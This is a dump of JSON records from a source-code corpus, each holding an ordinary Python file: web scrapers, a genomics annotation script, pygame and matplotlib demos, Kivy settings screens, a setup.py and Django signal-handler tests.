{"seq_id": "282285189", "text": "import sys\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n\n###############################😎 Split LINES IN .TXT FILE & opening WEBDRIVER at the 1st Url #####################################################\n\n\nwith open('links-penalty.txt','r') as fo:\n count=0\n for line in fo:\n count+=1\n \n url=line\n from selenium import webdriver\n driver=webdriver.PhantomJS('/home/jkernel/Desktop/python books/phantomjs/bin/phantomjs',service_args=['--load-images=no','--disk-cache=true'])\n driver.get(url)\n time.sleep(3)\n \n ##################################😎 HOME TEAM CONFIG ###################################################\n search_team1_name= driver.find_element_by_css_selector('div.hostteam div.name')\n search_team2_name= driver.find_element_by_css_selector('div.guestteam div.name')\n team1_name= search_team1_name.text\n team2_name= search_team2_name.text\n \n \n \n #Typwnei ta onomata omadwn\n print(team1_name,\"-\",team2_name)\n \n #typwnei tis red cards\n try:\n \tsearch_team1_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(1)')\n \tteam1_red_card=search_team1_red_card.text\n \t\n \tprint(\"Home Team Red Cards: \",team1_red_card)\n \tsearch_team2_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(3)')\n \tteam2_red_card=search_team2_red_card.text\n \tprint(\"Away Team Red Cards: \",team2_red_card) \t\n\n except NoSuchElementException:\n \tprint(\"No red card\")\n \n \n #dokimazei ean yparxei penalty\n try:\t \n\t search_team1_penalty= driver.find_element_by_css_selector('div.penalty')\n\t if(search_team1_penalty.is_displayed()==True):\n\t \tprint(team1_penalty_scored)\n except NoSuchElementException:\n \tprint(\"No penalty found\")\n \n \n \t\n try:\n\t search_penalty_missed= driver.find_element_by_css_selector('div.miss')\n except NoSuchElementException:\n \tprint(\"No missed penalty\")\n try:\n\t search_team1_own_goal= driver.find_element_by_css_selector('div.own')\n\t owngoal=search_team1_own_goal.text\n\t print(owngoal)\n except NoSuchElementException:\n \tprint(\"No own goal\")\n \t\n\n driver.quit()\n print(\"#######################################################\") \n\n\n\n", "sub_path": "match_details.py", "file_name": "match_details.py", "file_ext": "py", "file_size_in_byte": 2482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "selenium.webdriver.PhantomJS", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 18, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 65, "usage_type": "name"}]} {"seq_id": "458134294", "text": "import sys, json\n\nANNOVAR_OUTPUT = 'ANNOVAR_MODIFIED_ClinVar2019_Patho_HasOMIM_Ambiguous_MGOS.tsv'\nHPOA_MIM_GENE_PAIRS = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_mim_gene_pairs.json'\nHPOA_ALL_GENES_PATH = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_genes.json'\n\nout = sys.stdout\nif len(sys.argv) > 1:\n out = open(sys.argv[1], 'w')\n\ndef extract_annovar_labeled_gene(line):\n ln = line.strip().split('\\t')\n return ln[12]\n\ndef extract_omim_from_preserved_info_field(line):\n ln = line.strip().split('\\t')[25].split(';')\n clndisdb = [x for x in ln if 'CLNDISDB=' in x][0].split('=')[-1].split(',')\n\n omim = [x for x in clndisdb if 'OMIM:' in x][0]\n\n return omim\n\ndef try_to_get_correct_genesymbol(genes):\n sep = genes.split(';')\n correct_gene = sep[0]\n for gene in sep:\n if gene in hpoa_all_genes:\n correct_gene = gene\n return correct_gene\n\nwith open(HPOA_MIM_GENE_PAIRS) as f:\n hpoa_omim_gene_pairs = set(tuple(pair) for pair in json.load(f))\n\nwith open(HPOA_ALL_GENES_PATH) as f:\n hpoa_all_genes = set(json.load(f))\n\nmatched = 0\nunmatched = 0\n\nwith open(ANNOVAR_OUTPUT) as f:\n for line in f:\n if line[0] == '#':\n print(line.strip(), file=out)\n continue\n \n annovar_labeled_gene = extract_annovar_labeled_gene(line)\n if ';' in annovar_labeled_gene:\n annovar_labeled_gene = try_to_get_correct_genesymbol(annovar_labeled_gene)\n omim = extract_omim_from_preserved_info_field(line)\n\n if tuple([omim, annovar_labeled_gene]) in hpoa_omim_gene_pairs:\n print('{}\\t{}|{}'.format(line.strip(), omim, annovar_labeled_gene), file=out)\n matched += 1\n \n else:\n print('{}\\t.'.format(line.strip()), file=out)\n unmatched += 1\n\nprint('Successfully matched {} variants from ANNOVAR output that had (OMIM, gene) pairs in HPO-A.'.format(matched))\nprint('Could not match {} variants because (OMIM, gene) pair not found in HPO-A.'.format(unmatched))\n\n\nif out != sys.stdout:\n out.close()", "sub_path": "onto/clinvar/Clean/Ambiguous/MGOS/append_omim_gene_pair_to_annovar_if_possible.py", "file_name": "append_omim_gene_pair_to_annovar_if_possible.py", "file_ext": "py", "file_size_in_byte": 1968, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.stdout", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 63, "usage_type": "attribute"}]} {"seq_id": "638761106", "text": "import pygame\n\nclass Asteroid(pygame.sprite.Sprite):\n def __init__(self,size,x,y,color):\n super().__init__()\n self.size = size\n self.color = color\n self.image = pygame.Surface( (self.size, self.size))\n self.image.fill(self.color)\n self.rect = self.image.get_rect(topleft=(x, y))\n\n\n", "sub_path": "asteroid.py", "file_name": "asteroid.py", "file_ext": "py", "file_size_in_byte": 326, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.sprite", "line_number": 3, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 8, "usage_type": "call"}]} {"seq_id": "566521495", "text": "from loguru import logger\n\nfrom sinric import Sinric\n\napiKey = \"Api Key\"\n\n\ndef power_state(deviceId, state):\n logger.info(\"{} {}\", deviceId, state)\n\n\ndef set_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef adjust_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef set_thermostat_mode(deviceId, value):\n logger.info(\"{} {}\", deviceId, value)\n\n\ncallbacks = {\n \"setPowerState\": power_state,\n \"SetTargetTemperature\": set_target_temp,\n \"AdjustTargetTemperature\": adjust_target_temp,\n \"SetThermostatMode\": set_thermostat_mode,\n}\n\nif __name__ == \"__main__\":\n ob = Sinric(apiKey, callbacks)\n ob.handle()\n", "sub_path": "python_examples/examples/thermostat_example.py", "file_name": "thermostat_example.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "loguru.logger.info", "line_number": 9, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 13, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 13, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 17, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 17, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 21, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 21, "usage_type": "name"}, {"api_name": "sinric.Sinric", "line_number": 32, "usage_type": "call"}]} {"seq_id": "275238645", "text": "# -*- coding: utf-8 -*-\n# @Time : 20-6-4 下午2:13\n# @Author : zhuying\n# @Company : Minivision\n# @File : utility.py\n# @Software : PyCharm\n\nfrom datetime import datetime\nimport os\nimport torch\nimport numpy as np\n\ndef get_time():\n return (str(datetime.now())[:-10]).replace(' ', '-').replace(':', '-')\n\n\ndef get_kernel(height, width):\n kernel_size = ((height + 15) // 16, (width + 15) // 16)\n return kernel_size\n\n\ndef get_width_height(patch_info):\n w_input = int(patch_info.split('x')[-1])\n h_input = int(patch_info.split('x')[0].split('_')[-1])\n return w_input,h_input\n\n\ndef parse_model_name(model_name):\n info = model_name.split('_')[0:-1]\n h_input, w_input = info[-1].split('x')\n model_type = model_name.split('.pth')[0].split('_')[-1]\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[0])\n return int(h_input), int(w_input), model_type, scale\n\ndef parse_model_name_new_format(model_name):\n info = model_name.split('_')[0:-2]\n h_input, w_input = info[-1].split('x')\n model_type = \"MiniFASNetV1SE\"\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[3])\n return int(h_input), int(w_input), model_type, scale\n\ndef make_if_not_exist(folder_path):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n\n\"\"\"\nUse in PyTorch.\n\"\"\"\n\ndef accuracy(output, target):\n \"\"\"Computes the accuracy for multiple binary predictions\"\"\"\n pred = output >= 0.5\n truth = target >= 0.5\n acc = pred.eq(truth).sum() / target.numel()\n return acc\n\n\nclass BinaryClassificationMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.tp = 0\n self.tn = 0\n self.fp = 0\n self.fn = 0\n self.acc = 0\n self.pre = 0\n self.rec = 0\n self.f1 = 0\n\n def update(self, pred, target):\n pred = torch.tensor(pred)\n target = torch.tensor(target)\n self.tp = pred.mul(target).sum(0).float()\n self.tn = (1 - pred).mul(1 - target).sum(0).float()\n self.fp = pred.mul(1 - target).sum(0).float()\n self.fn = (1 - pred).mul(target).sum(0).float()\n self.acc = (self.tp + self.tn).sum() / (self.tp + self.tn + self.fp + self.fn).sum()\n self.pre = self.tp / (self.tp + self.fp)\n self.rec = self.tp / (self.tp + self.fn)\n self.f1 = (2.0 * self.tp) / (2.0 * self.tp + self.fp + self.fn)\n self.avg_pre = np.nanmean(self.pre)\n self.avg_rec = np.nanmean(self.rec)\n self.avg_f1 = np.nanmean(self.f1)\n # print(\"tp, tn, fp, fn: \", self.tp.item(), self.tn.item(), self.fp.item(), self.fn.item())", "sub_path": "src/utility.py", "file_name": "utility.py", "file_ext": "py", "file_size_in_byte": 2716, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 95, "usage_type": "call"}]} {"seq_id": "334080852", "text": "'''\r\nCreated on 10 feb. 2018\r\n\r\n@author: Sven\r\n'''\r\n\r\nif __name__ == '__main__':\r\n pass\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nfrom matplotlib.lines import Line2D\r\n\r\n# Prepare 100 random numbers to plot\r\nx = np.random.rand(100)\r\ny = np.random.rand(100)\r\n# Prepare 100 random numbers within the range of the number of\r\n# available markers as index\r\n# Each random number will serve as the choice of marker of the\r\n# corresponding coordinates\r\nmarkerindex = np.random.randint(0, len(Line2D.markers), 100)\r\nprint(markerindex)\r\n\r\n# shows possible markers and abbreviation\r\nprint(Line2D.markers)\r\n\r\n# Plot all kinds of available markers at random coordinates\r\n# for each type of marker, plot a point at the above generated\r\n# random coordinates with the marker type\r\nfor k, m in enumerate(Line2D.markers):\r\n i = (markerindex == k)\r\n plt.scatter(x[i], y[i], marker=m)\r\n\r\nplt.show()\r\n\r\n# Prepare 5 lines\r\nx = np.linspace(0,20,10)\r\ny1 = x\r\ny2 = x*2\r\ny3 = x*3\r\ny4 = x*4\r\ny5 = x*5\r\n\r\n\r\n# Plot lines with different marker sizes\r\nplt.plot(x,y1,label = 'x', lw=1, marker='s', ms=5) # square size 10\r\nplt.plot(x,y2,label = '2x', lw=1, marker='^', ms=6) # triangle size 12\r\nplt.plot(x,y3,label = '3x', lw=1, marker='o', ms=5) # circle size 10\r\nplt.plot(x,y4,label = '4x', lw=1, marker='D', ms=4) # diamond size 8\r\nplt.plot(x,y5,label = '5x', lw=1, marker='P', ms=6) # filled plus sign\r\n# size 12\r\n\r\n# get current axes and store it to ax\r\nax = plt.gca()\r\nplt.legend()\r\nplt.show()\r\n", "sub_path": "LearnPython/scripts/learnmathplotlib/markers.py", "file_name": "markers.py", "file_ext": "py", "file_size_in_byte": 1537, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "numpy.random.rand", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D.markers", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.lines.Line2D.markers", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.lines.Line2D.markers", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}]} {"seq_id": "91546305", "text": "import time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef dailystatistics(finish):\n with open(finish, 'r') as f:\n content = f.readlines()\n\n times = []\n for i in content:\n if not i.startswith(\"/\") and i:\n temp = time.strptime(i.strip(), \"%a %b %d %H:%M:%S CST %Y\")\n a = time.strftime('%F',temp)\n times.append(a)\n\n datas = pd.DatetimeIndex(times)\n jobs = np.ones(len(datas))\n data = pd.DataFrame(data=jobs, index=times, columns=['job'])\n new_jobs = data.groupby(level=0)\n zjw = new_jobs.count()\n zjw.sort_index()['job'].plot()\n plt.show()\n\nif __name__ == \"__main__\":\n # finish = \"/Users/zhangjiawei/Documents/code/researchcode/dailystatistics/finish\"\n dailystatistics(finish=sys.argv[1])\n", "sub_path": "dailystatistics/dailyjobplot.py", "file_name": "dailyjobplot.py", "file_ext": "py", "file_size_in_byte": 811, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "time.strptime", "line_number": 15, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}]} {"seq_id": "154532039", "text": "import pygame\r\npygame.init()\r\n\r\nFULL_SCREEN_SIZE = pygame.display.list_modes()[0]\r\nWIN_SIZE = [i // 4 for i in FULL_SCREEN_SIZE]\r\n\r\nscreen = pygame.display.set_mode(WIN_SIZE)\r\n\r\nrun = True\r\nwhile run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n \r\n pygame.display.flip()\r\n\r\npygame.quit()\r\n", "sub_path": "demo/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 354, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.init", "line_number": 2, "usage_type": "call"}, {"api_name": "pygame.display.list_modes", "line_number": 4, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 17, "usage_type": "call"}]} {"seq_id": "593017022", "text": "\n\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\n\nDOMAIN = 'intranet.iitg.ernet.in/'\nURL = 'http://intranet.iitg.ernet.in/'\nlis=[]\nindex_element = 0 \n\nclass MySpider(BaseSpider):\n name = 'crawler'\n #allowed_domains = [DOMAIN]\n start_urls = [\n URL\n ]\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n for url in hxs.select('//a/@href').extract():\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url= URL + url\n if 'iitg' in url:\n if url not in lis:\n lis.append(url) \n fo=open('finallink.txt','a')\n fo.write(url + \"\\n\")\n fo.close()\n yield Request(url, callback=self.parse)\n\n", "sub_path": "crawler iitg intranet/craigslist_sample/spiders/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 12, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 20, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 30, "usage_type": "call"}]} {"seq_id": "290820648", "text": "import requests\nimport json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nwinners_wiki_url = 'https://en.wikipedia.org/w/api.php?action=parse&format=json&prop=text&page=List_of_2016_Summer_Olympics_medal_winners§ion='\n# response = requests.get(wiki_url)\n# data = json.loads(response.text)\n# print(data)\n\n\nhtml_index_list = list(range(1, 78))\nremoveable_indicies = [2, 7, 12, 17, 22, 26, 33, 39, 43, 47, 51, 54, 59, 68, 71, 75, 76, 77, 78]\nfor index in removeable_indicies:\n if index in (html_index_list):\n html_index_list.remove(index)\n\nfor index in html_index_list:\n url = winners_wiki_url + str(index)\n response = requests.get(url)\n HTML = json.loads(response.text)['parse']['text']['*']\n\n\n\n\n\n", "sub_path": "Citadel Data Open/Code/webscrape.py", "file_name": "webscrape.py", "file_ext": "py", "file_size_in_byte": 723, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}]} {"seq_id": "343837793", "text": "import setuptools\n\nwith open(\"../README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name=\"cog\",\n version=\"0.0.1\",\n author_email=\"team@replicate.ai\",\n description=\"Containers for machine learning\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/replicate/cog\",\n license=\"Apache License 2.0\",\n python_requires=\">=3.6.0\",\n install_requires=[\n # intionally loose. perhaps these should be vendored to not collide with user code?\n \"flask>=2,<3\",\n \"redis>=3,<4\",\n \"requests>=2,<3\",\n \"PyYAML\",\n ],\n packages=setuptools.find_packages(),\n)\n", "sub_path": "python/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 708, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 24, "usage_type": "call"}]} {"seq_id": "416839433", "text": "# -*- coding: utf-8 -*-\nimport mywallet\nimport uuosconfig\n\nfrom kivy.uix.button import Label\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.popup import Popup\nfrom customui import show_reminder\nfrom lang import tr\n\nclass LanguageDialog(Popup):\n def __init__(self, action):\n super(LanguageDialog, self).__init__()\n language = uuosconfig.get_value('language')\n if language is None:\n language = 1\n if language == 0:\n self.index = 0\n self.ids.box_english.active = True\n elif language == 1:\n self.index = 1\n self.ids.box_chinese.active = True\n \n def on_ok(self):\n print(self.index)\n uuosconfig.set_value('language', self.index)\n lang_name = ['en', 'cn'][self.index]\n uuosconfig.app.switch_lang(lang_name)\n uuosconfig.set_value('lang', lang_name)\n self.dismiss()\n\n def on_cancel(self):\n self.dismiss()\n\nclass ThemingDialog(Popup):\n def __init__(self):\n super(ThemingDialog, self).__init__()\n theme = uuosconfig.get_current_theme()\n self.setting = uuosconfig.get_current_theme()\n #self.ids.id_switch_theme.bind(on_press=uuosconfig.app.switch_theme)\n if theme == 'normal':\n self.ids.id_normal.active = True\n self.ids.id_black.active = False\n self.setting = 'normal'\n else:\n self.ids.id_normal.active = False\n self.ids.id_black.active = True\n self.setting = 'black'\n def on_ok(self):\n show_reminder(tr._('Restart App to make the new settings take effect'))\n uuosconfig.set_current_theme(self.setting)\n uuosconfig.app.switch_theme(self.setting)\n #self.change_bgcolor(self.setting)\n #print(uuosconfig.app.theme)\n self.dismiss()\n\nclass SettingScreen(Screen):\n def __init__(self, **kargs):\n super(SettingScreen, self).__init__(**kargs)\n print(uuosconfig.get_current_theme())\n\n def swith_language(self):\n self.dialog = LanguageDialog(self.on_ok)\n self.dialog.ids.id_chinese.text = '中文'\n self.dialog.open()\n\n def check_upgrade(self):\n show_reminder(tr._(\"No upgrade detected\"))\n\n def on_ok(self):\n self.dialog.on_ok()\n self.dialog.dismiss()\n\n def swith_theme(self):\n popup = ThemingDialog()\n popup.open()\n print(uuosconfig.app.theme)\n \n # def set_bgcolor(self,theme):\n # if theme == 'normal':\n # uuosconfig.bg_color = [0.965,0.965,0.965,1]\n # else \n # uuosconfig.bg_color = [0.1176,0.1294,0.1647,1]", "sub_path": "settingscreen.py", "file_name": "settingscreen.py", "file_ext": "py", "file_size_in_byte": 2685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "kivy.uix.popup.Popup", "line_number": 12, "usage_type": "name"}, {"api_name": "uuosconfig.get_value", "line_number": 15, "usage_type": "call"}, {"api_name": "uuosconfig.set_value", "line_number": 27, "usage_type": "call"}, {"api_name": "uuosconfig.app.switch_lang", "line_number": 29, "usage_type": "call"}, {"api_name": "uuosconfig.app", "line_number": 29, "usage_type": "attribute"}, {"api_name": "uuosconfig.set_value", "line_number": 30, "usage_type": "call"}, {"api_name": "kivy.uix.popup.Popup", "line_number": 36, "usage_type": "name"}, {"api_name": "uuosconfig.get_current_theme", "line_number": 39, "usage_type": "call"}, {"api_name": "uuosconfig.get_current_theme", "line_number": 40, "usage_type": "call"}, {"api_name": "customui.show_reminder", "line_number": 51, "usage_type": "call"}, {"api_name": "lang.tr._", "line_number": 51, "usage_type": "call"}, {"api_name": "lang.tr", "line_number": 51, "usage_type": "name"}, {"api_name": "uuosconfig.set_current_theme", "line_number": 52, "usage_type": "call"}, {"api_name": "uuosconfig.app.switch_theme", "line_number": 53, "usage_type": "call"}, {"api_name": "uuosconfig.app", "line_number": 53, "usage_type": "attribute"}, {"api_name": "kivy.uix.screenmanager.Screen", "line_number": 58, "usage_type": "name"}, {"api_name": "uuosconfig.get_current_theme", "line_number": 61, "usage_type": "call"}, {"api_name": "customui.show_reminder", "line_number": 69, "usage_type": "call"}, {"api_name": "lang.tr._", "line_number": 69, "usage_type": "call"}, {"api_name": "lang.tr", "line_number": 69, "usage_type": "name"}, {"api_name": "uuosconfig.app", "line_number": 78, "usage_type": "attribute"}]} {"seq_id": "194952019", "text": "from __future__ import absolute_import, print_function, unicode_literals\n\nfrom django.db.models.signals import post_init, post_save\nfrom django.dispatch import Signal\nfrom django.test import TestCase\nfrom tests.myapp.models import Foo, test_handler\nfrom roadies.handlers import handler, Handler\n\ntry:\n import mock\nexcept ImportError:\n from unittest import mock\n\n\ndef async_action(*args):\n pass\n\n\n@handler\ndef do_something(sender, foo, bar, **kwargs):\n \"\"\"Test functional handlers.\"\"\"\n async_action(foo, bar)\n\n\n@handler(post_init, sender='myapp.Foo', dispatch_uid='testing')\ndef do_something_else(sender, instance, **kwargs):\n async_action(instance)\n\n\ntest_signal = Signal(providing_args=['foo', 'bar'])\n\n\nclass HandlerTests(TestCase):\n\n def test_do_something_is_handler_instance(self):\n self.assertIsInstance(do_something, Handler)\n\n def test_connect_no_sender(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertTrue(result)\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertFalse(result)\n\n def test_connect_with_sender_string(self):\n do_something.connect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertTrue(disconnected)\n\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertFalse(disconnected)\n\n def test_do_something_name(self):\n self.assertEqual(do_something.__name__, 'do_something')\n\n def test_do_something_module(self):\n self.assertEqual(do_something.__module__, 'tests.test_handlers')\n\n def test_do_something_doc(self):\n self.assertEqual(do_something.__doc__, 'Test functional handlers.')\n\n def test_do_something_does_something_on_signal(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n with mock.patch('tests.test_handlers.async_action') as func:\n test_signal.send(None, foo=1, bar=2)\n self.assertTrue(func.called)\n func.assert_called_once_with(1, 2)\n\n def test_do_something_else_is_handler(self):\n self.assertIsInstance(do_something_else, Handler)\n\n def test_do_something_else_executed_on_post_init(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n instance = Foo(bar='baz')\n self.assertTrue(func.called)\n func.assert_called_once_with(instance)\n\n def test_calling_the_handler_directly(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n do_something(None, 'foo', 'bar')\n self.assertTrue(func.called)\n func.assert_called_once_with('foo', 'bar')\n\n def test_autodiscover_works(self):\n self.assertTrue(\n post_save.disconnect(test_handler, dispatch_uid='test_handler')\n )\n", "sub_path": "tests/test_handlers.py", "file_name": "test_handlers.py", "file_ext": "py", "file_size_in_byte": 3185, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "roadies.handlers.handler", "line_number": 19, "usage_type": "name"}, {"api_name": "roadies.handlers.handler", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models.signals.post_init", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.dispatch.Signal", "line_number": 30, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 33, "usage_type": "name"}, {"api_name": "roadies.handlers.Handler", "line_number": 36, "usage_type": "argument"}, {"api_name": "unittest.mock.patch", "line_number": 76, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 76, "usage_type": "name"}, {"api_name": "roadies.handlers.Handler", "line_number": 82, "usage_type": "argument"}, {"api_name": "unittest.mock.patch", "line_number": 85, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 85, 